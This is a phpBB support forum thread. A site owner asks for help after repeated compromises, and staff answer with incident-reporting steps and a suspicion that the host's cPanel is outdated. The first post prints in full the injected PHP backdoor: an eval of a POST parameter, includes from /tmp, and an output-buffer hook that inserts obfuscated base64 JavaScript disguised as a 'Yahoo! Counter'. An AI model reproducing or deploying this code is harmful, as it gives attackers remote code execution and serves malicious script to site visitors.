Help! My phpBB3 site's getting hacked :(

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Scam Warning
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
dragonaut
Registered User
Posts: 6
Joined: Fri Jun 02, 2006 6:15 pm

Help! My phpBB3 site's getting hacked :(

Post by dragonaut »

Hi from newbie :)

I need your help, guys..back when I had phpbb2 on my site, I was getting these 'hacks' where someone is injecting the following code at the end of my php pages:

Code: Select all

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJyU3NiFhciAlNjFALGklMkMhJTVGJTNCJCU2OXwlM0R+IjdgNkAlMkVgJTMxNjMhLj8lMjJgJTNCPyU2MSUzRFsiPzclMzglMkUjMTUlMzd8LiUzMXw0ITIkJTJFfjV8JTM4fiIhJTJDJTY5YCsiMX40JTMxLiUzMyUzNSEiLEBpK34lMjJ+JTMxfCUzOSQlMzEjJTJFMSUzMyUzMiIlNUQlM0IlNUY/JTNEJCUzMSUzQiU2OT8lNjYofGRvJTYzIyU3NW1lJTZFfHQhLiU2M28/b2s/JTY5JCU2NSUyRSU2RCU2MSQlNzQlNjMjaEAoLyU1Q3xiJTY4JTY3fCU2NnQhPXwxJCUyRiUyOSUzRD8lM0QjbkAlNzUkJTZDIWwpPyU2Nm9AJTcyJCUyOCU2OSMlM0QlMzB8OyU2OSQlM0MlMzMlM0IlNjklMkIlMkJ+JTI5fCU2NCElNkZgY3x1bXwlNjUkJTZFYHQ/JTJFdyU3Mj9pQCU3NGBlQCUyOCJ+JTNDc2M/JTcyJCU2OUAlNzB8JTc0JTNFISU2OUAlNjZ+KGAlNUYpPyU2ND8lNkZjdW0kJTY1JTZFJTc0fCUyRSQlNzclNzIlNjklNzRgJTY1JCUyOHwlNUMkJTIyQCUzQ0AlNzNgY2ByJTY5cGB0YCBpfGRAPSQlNUYlMjJAJTJCPyU2OSMlMkI/IiQlNUYlMjB+JTczJTcyIWMjPSQlMkYlMkY/IkArJTYxIVsjaV0jJTJCJTIyQCUyRn5jJTcwfiUyRiUzRXwlM0MlNUMlNUMhJTJGP3NgJTYzJTcyISU2OSU3MCU3NCUzRSU1QyUyMiUyOSElM0M/JTVDL3N8JTYzJTcyJTY5fiU3MHR8JTNFYCIlMjkjOycpLnJlcGxhY2UoL1x8fFwkfFwhfGB8fnxcP3wjfEAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

And they're also saving some code in the site description field.

I was told this would be fixed when if I upgraded to PHPbb3, so I created a new site, with new file permissions (as specified by the phpbb install instructions) but now it happened again on phpbb3!! Could you guys please give me tips on how it could be happening and how to avoid it? Thanks a lot!

User avatar
Erik Frèrejean
Former Team Member
Posts: 9899
Joined: Tue Oct 09, 2007 9:09 am
Location: The Netherlands, 3.0.x Support Forum
Name: Erik Frèrejean
Contact:

Re: Help! My phpBB3 site's getting hacked :(

Post by Erik Frèrejean »

ReadMe Before Posting / Frequently Asked Questions wrote:My board has been hacked, what do I do?
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
Support Toolkit | Support Request Template | Knowledge Base | phpBB 3.0.x documentation
I don't give support via PM or IM! (all unsolicited pms will be trashed!)

User avatar
stevemaury
Support Team Member
Support Team Member
Posts: 50997
Joined: Thu Nov 02, 2006 12:21 am
Location: The U.P.
Name: Steve
Contact:

Re: Help! My phpBB3 site's getting hacked :(

Post by stevemaury »

Same host? It's most likely coming through their CPanel. Ask them what their CPanel version is.
For REALLY good and VERY inexpensive hosting CLICK HERE

I can stop all your spam. I can upgrade or update your Board. PM or email me. (Paid support)

dragonaut
Registered User
Posts: 6
Joined: Fri Jun 02, 2006 6:15 pm

Re: Help! My phpBB3 site's getting hacked :(

Post by dragonaut »

Hey Steve,

Yea, same host. cpanel version is: 2.3.325.20030413


Thanks !

aMaz3
Registered User
Posts: 27
Joined: Tue Sep 02, 2008 6:32 pm

Re: Help! My phpBB3 site's getting hacked :(

Post by aMaz3 »

I'm afraid I might get hacked.

I wish phpbb made it where admins can set in how many login attempts users can have to login to their user name and then it would end the session if they went above it. That would be a cool feature like some other forums have.

SamG
Former Team Member
Posts: 3221
Joined: Fri Aug 31, 2001 6:35 pm
Location: Beautiful Northwest Lower Michigan
Name: Sam Graf

Re: Help! My phpBB3 site's getting hacked :(

Post by SamG »

The existing "Maximum number of login attempts" feature is similar. It doesn't kill the session, but it does raise the login complexity.
We should talk less, and say more.

User avatar
stevemaury
Support Team Member
Support Team Member
Posts: 50997
Joined: Thu Nov 02, 2006 12:21 am
Location: The U.P.
Name: Steve
Contact:

Re: Help! My phpBB3 site's getting hacked :(

Post by stevemaury »

dragonaut wrote:Hey Steve,

Yea, same host. cpanel version is: 2.3.325.20030413


Thanks !
You sure? the latest version is 11.x
For REALLY good and VERY inexpensive hosting CLICK HERE

I can stop all your spam. I can upgrade or update your Board. PM or email me. (Paid support)

dragonaut
Registered User
Posts: 6
Joined: Fri Jun 02, 2006 6:15 pm

Re: Help! My phpBB3 site's getting hacked :(

Post by dragonaut »

stevemaury wrote:
dragonaut wrote:Hey Steve,

Yea, same host. cpanel version is: 2.3.325.20030413


Thanks !
You sure? the latest version is 11.x

Wow..that's what the tech person in the live support chat told me. She probably didn't understand..should I ask her something more specific?

User avatar
stevemaury
Support Team Member
Support Team Member
Posts: 50997
Joined: Thu Nov 02, 2006 12:21 am
Location: The U.P.
Name: Steve
Contact:

Re: Help! My phpBB3 site's getting hacked :(

Post by stevemaury »

I believe they have a cpanel exploit and I believe they know it. Have you reported what happened?
For REALLY good and VERY inexpensive hosting CLICK HERE

I can stop all your spam. I can upgrade or update your Board. PM or email me. (Paid support)

dragonaut
Registered User
Posts: 6
Joined: Fri Jun 02, 2006 6:15 pm

Re: Help! My phpBB3 site's getting hacked :(

Post by dragonaut »

Yes, but I got the standard cut & paste response from the last time of 'we're sorry, check your addons, perms, etc. etc. '. So to make sure it wasn't on my side, I created a new domain, fresh phpbb3 install with no add-ons, to make sure perms were exactly as they should be, and it happened again.

My files were also chowned to 'httpd:httpd' which makes me believe it probably wasn't something done through phpbb..I don't know if a phpbb exploit could go that deep.

User avatar
Phil
Former Team Member
Posts: 10403
Joined: Sat Nov 25, 2006 4:11 am
Name: Phil Crumm
Contact:

Re: Help! My phpBB3 site's getting hacked :(

Post by Phil »

If your board has been hacked, please file a report with the Incident Tracker. This will allow us to verify the cause of the compromise, and, if necessary, will allow you to provide your host with information regarding the exploit. As this is the proper method of dealing with a compromised board, I am going to go ahead and close this topic. Please file a report with the Incident Tracker, as per above.

If you have any questions, please feel free to PM me. Good luck.
Moving on, with the wind. | My Corner of the Web

Locked

Return to “[3.0.x] Support Forum”